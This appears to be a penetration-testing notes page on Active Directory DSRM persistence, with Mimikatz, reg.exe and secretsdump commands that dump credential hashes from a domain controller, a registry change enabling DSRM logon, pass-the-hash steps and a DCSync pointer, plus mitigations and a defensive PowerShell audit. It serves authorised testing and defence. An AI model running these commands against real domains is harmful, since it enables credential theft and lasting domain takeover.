Directory Services Restore Mode (DSRM)


Last updated 3 years ago

In every domain there is a Domain Admin named 'Administrator'. However, on every Domain Controller there is also a local Administrator. These two users are different.

How can we tell?

If you have Domain Admin privileges, dump both the SAM and the NTDS and you will get two different hashes for 'Administrator'.

The difference can also be seen with these two Mimikatz commands, which dump the SAM and the LSA respectively:

Invoke-Mimikatz -Command '"token::elevate" "lsadump::sam"'
Invoke-Mimikatz -Command '"lsadump::lsa /patch"'

The Administrator hash from the SAM dump belongs to the local Administrator and the NTDS hash to the Domain Administrator.

The local Administrator on the DC is also known as the DSRM account.

What does this mean?

In general, the local Administrator account is hardly used on a running DC. However, to configure a Domain Controller, we are prompted to enter a DSRM password for the local Administrator. This provides a backup method for the Domain Admins to access the DC and the database.

This means that obtaining the local DC Administrator hash and then passing it provides another long-term method of persistence. It can be quite effective because the DSRM password is rarely changed.

As the local Admin is usually not able to logon to the DC, we must first make sure that we will be able to logon by changing the "DsrmAdminLogonBehavior" registry key. This will be a significant downgrade to the security of the Domain Controller. Therefore, if you are on a live engagement, make sure to check with your client that this is allowable.

Steps

Step 1 - Dump the SAM of the DC to Obtain the DSRM Hash

  • Method 1: From Powershell - Use Mimikatz

Invoke-Mimikatz -Command '"token::elevate" "lsadump::sam"'
  • Method 2: Copy the SAM and system hives, download them, then run secretsdump.py from impacket to extract the hash

# using reg.exe
cmd.exe /c 'reg.exe save hklm\sam c:\windows\temp\sam.bak'
cmd.exe /c 'reg.exe save hklm\system c:\windows\temp\system.bak'

# after copying the files to your machine run secretsdump.py
python secretsdump.py -sam sam.bak -system system.bak LOCAL
  • Method 3: From Linux - use crackmapexec or secretsdump.py to extract the hash remotely

# crackmapexec
crackmapexec smb <dc-ip> -u <user> -p <pass> --sam

# secretsdump.py (impacket target syntax is <domain>/<user>@<target>; it prompts for the password)
sudo python3 secretsdump.py <domain>/<user>@<dc-ip>

Step 2 - Setup to Authenticate as local Admin

From the DC...

# Check if 'DsrmAdminLogonBehavior' property exists
Get-ItemProperty "HKLM:\System\CurrentControlSet\Control\Lsa\" | select DsrmAdminLogonBehavior

# If there is no value, create a new property and set it to 2
New-ItemProperty "HKLM:\System\CurrentControlSet\Control\Lsa\" -Name "DsrmAdminLogonBehavior" -Value 2 -PropertyType DWORD

# Then check again and make sure 'DsrmAdminLogonBehavior' is set to 2
Get-ItemProperty "HKLM:\System\CurrentControlSet\Control\Lsa\" | select DsrmAdminLogonBehavior

Step 3 - Pass the hash

  • From another machine, attempt to logon to the DC

Invoke-Mimikatz -Command '"sekurlsa::pth /domain:<dc.domain> /user:Administrator /ntlm:<DSRM-hash> /run:powershell.exe"'

# From your new window check your access to the DC
ls \\<dc.domain>\C$

To reset the "DsrmAdminLogonBehavior" Property

# If the property didn't exist beforehand
Remove-ItemProperty "HKLM:\System\CurrentControlSet\Control\Lsa\" -Name "DsrmAdminLogonBehavior"

# If there was a "DsrmAdminLogonBehavior" registry key set prior
Set-ItemProperty "HKLM:\System\CurrentControlSet\Control\Lsa\" -Name "DsrmAdminLogonBehavior" -Value <prior_value>

Mitigations

  • Change the DSRM password regularly

  • Check regularly for events with ID 4657 or 4794

  • Make sure DSRM passwords are unique for each DC
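
The following PowerShell audit is an added example and is not part of the original notes; it ties the "DsrmAdminLogonBehavior" check from Step 2 to the event IDs listed above from the defender's side. It assumes the ActiveDirectory RSAT module is installed, that WinRM is enabled on the Domain Controllers, and that the account running it can read the registry and the Security log on each DC. The seven-day lookback window and the non-zero exit code are choices made for this example.

```powershell
# Added defensive audit (not from the original page). Walks every DC in the domain,
# reads the DsrmAdminLogonBehavior value and pulls recent 4657/4794 events.
Import-Module ActiveDirectory

$lsaPath   = 'HKLM:\System\CurrentControlSet\Control\Lsa'
$valueName = 'DsrmAdminLogonBehavior'
$lookback  = (Get-Date).AddDays(-7)   # assumption: one week is enough for a weekly audit run

$dcs = (Get-ADDomainController -Filter *).HostName

$results = foreach ($dc in $dcs) {
    Invoke-Command -ComputerName $dc -ArgumentList $lsaPath, $valueName, $lookback -ScriptBlock {
        param($path, $name, $since)

        # 1. Registry state. Absent or 0 is the default: the DSRM account cannot log on
        #    while AD DS is running. 1 allows logon only when AD DS is stopped.
        #    2 allows logon at any time, which is the setting the persistence technique relies on.
        $value = (Get-ItemProperty -Path $path -Name $name -ErrorAction SilentlyContinue).$name
        if ($null -eq $value) {
            $state = 'Default (value absent)'
        } else {
            $state = switch ([int]$value) {
                0       { 'Default (0)' }
                1       { 'Logon allowed only while AD DS is stopped' }
                2       { 'ALERT: DSRM logon allowed at any time' }
                default { "Unexpected value $value" }
            }
        }

        # 2. Security log. 4794 = an attempt was made to set the DSRM administrator password.
        #    4657 = a registry value was modified; it only fires if "Audit Registry" is enabled
        #    and the Lsa key carries a SACL, so an empty result here is not proof of no change.
        $events = Get-WinEvent -FilterHashtable @{
            LogName   = 'Security'
            Id        = 4657, 4794
            StartTime = $since
        } -ErrorAction SilentlyContinue

        # Keep every 4794, and only those 4657 events that touch the DSRM value.
        $dsrmEvents = $events | Where-Object { $_.Id -eq 4794 -or $_.Message -match $name }

        [pscustomobject]@{
            DomainController = $env:COMPUTERNAME
            DsrmLogonValue   = $value
            State            = $state
            RecentEvents     = ($dsrmEvents | ForEach-Object { "$($_.TimeCreated) id=$($_.Id)" }) -join '; '
        }
    }
}

$results | Format-Table DomainController, DsrmLogonValue, State, RecentEvents -AutoSize

# Exit non-zero when any DC permits DSRM logon at all times, so a scheduled task can raise an alert.
if ($results | Where-Object { $_.DsrmLogonValue -eq 2 }) { exit 1 }
```

Run it from a management host as a scheduled task and treat any DC reporting a value of 2, or any 4794 event that does not line up with a planned DSRM password rotation, as something to investigate. Because the value is absent by default, a DC where it merely exists is already worth a second look.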

Once we have the hash we can either pass it to access the DC, or follow up with a DCSync attack and pull the password hashes of any account we wish, including krbtgt.